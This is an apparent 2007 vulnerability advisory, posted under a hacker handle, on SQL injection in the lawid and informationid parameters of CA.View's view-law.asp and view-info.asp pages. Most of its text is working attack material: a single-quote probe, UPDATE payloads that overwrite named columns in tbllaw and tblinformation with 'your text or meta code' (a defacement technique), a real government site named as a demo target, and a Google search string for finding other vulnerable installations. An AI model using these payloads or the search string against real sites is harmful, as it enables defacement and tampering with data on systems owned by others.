CA.View/view-law.asp/view-info.asp sql injection

2007-08-10T00:00:00
ID SECURITYVULNS:DOC:17748
Type securityvulns
Reporter Securityvulns
Modified 2007-08-10T00:00:00

Description

CA.View/view-law.asp/view-info.asp sql injection

Credit : CodeXpLoder'tq

mail : codexploder[at]hotmail[dot]com

site : Biyosecurity.net,expw0rm.com

thx : BiyoSecurityTeam all members thx 3APA3A

spec.note : "Live The Life"

ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

1-) example.com/[patch]/view-law.asp?lawid=(sql methot)

1-) example.com/[patch]/view-info.asp?informationid=(sql methot)

2-) example.com/ca/view-law.asp?lawid=(sql methot)

2-) example.com/ca/view-info.asp?informationid=(sql methot)

ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

3-) example.com/[patch]/view-law.asp?lawid=1'

3-) example.com/[patch]/view-info.asp?informationid=1'

4-) example.com/ca/view-law.asp?lawid=1,2,3,4, 5+update+tbl+set+column='your text or meta code';--

4-) example.com/ca/view-info.asp?informationid=1,2,3,4, 5+update+tbl+set+column='your text or meta code';--

tbl(law) : tbllaw #tbl(info) :tblinformation

column : lawdetail #column :title

demo site : www.mrd.go.th/home

google : inurl:/ac/view-law.asp?lawid or /AC/view-info.asp?informationid